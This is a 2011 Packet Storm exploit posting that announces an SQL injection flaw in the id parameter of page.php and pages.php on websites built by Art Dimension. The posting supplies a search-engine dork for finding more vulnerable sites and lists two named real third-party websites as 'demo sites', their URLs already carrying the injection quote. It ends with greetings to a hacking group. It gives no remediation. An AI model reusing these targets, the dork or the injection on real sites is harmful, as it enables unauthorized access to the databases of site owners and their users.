Art Dimension SQL Injection

2011-10-25T00:00:00
ID PACKETSTORM:106176
Type packetstorm
Reporter 3spi0n
Modified 2011-10-25T00:00:00

Description

                                        
                                            `# Exploit Title: Art Dimension Sql Injection Vulnerability  
# Date: 25.10.2011 - 01:03  
# Author: 3spi0n  
# Software Website: http://www.artdimension.ca/  
# Tested On: BackTrack 5 - Win7 Ultimate  
# Platform: Php  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
  
[$] Vulnerable File: Page.php / Pages.php  
  
[$] Dorks: "Designed by Art Dimension"  
  
[$] Demo Sites:  
  
[~] http://www.packlinecorp.com/temp/pages.php?id=14" [PhpSQLi]  
[~] http://www.artexclub.com/page.php?ID=37" [PhpSQLi]  
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
# We attempted to work, you can not imagine.  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
# Contact: Http://3spi0n.Net/  
# Greetz: Http://DarkDevilz.in/  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
Mr.PaPaRoSSe Black_Umo ALEXTRAX Brs_BaRoN ZyX x-Leader  
Legend Coder DARKCOD3R Santiq0 53rh4t PerS ExDeaTH  
  
[And DD'z Family]  
  
[DarkDevilz - Defence And Destruction Group'z - TURKEY]  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>  
`